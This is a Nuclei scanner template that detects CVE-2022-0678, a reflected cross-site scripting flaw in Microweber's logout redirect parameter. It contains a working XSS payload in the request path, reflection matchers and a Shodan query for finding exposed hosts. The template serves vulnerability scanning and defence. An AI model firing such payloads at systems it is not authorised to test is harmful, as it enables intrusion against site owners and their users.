nuclei-templates/cves/2022/CVE-2022-0678.yaml

40 lines
1.0 KiB
YAML
Raw Normal View History

2022-09-14 17:19:21 +00:00
id: CVE-2022-0678
info:
name: Microweber Cross-Site Scripting
author: tess
severity: medium
description: |
Can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
reference:
- https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
- https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
- https://nvd.nist.gov/vuln/detail/CVE-2022-0678
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0678
metadata:
verified: true
shodan-query: http.favicon.hash:780351152
tags: xss,microweber
requests:
- method: GET
path:
- '{{BaseURL}}/demo/api/logout?redirect_to=/asdf"><iframe%20onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '><iframe onload=alert(document.domain)>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 404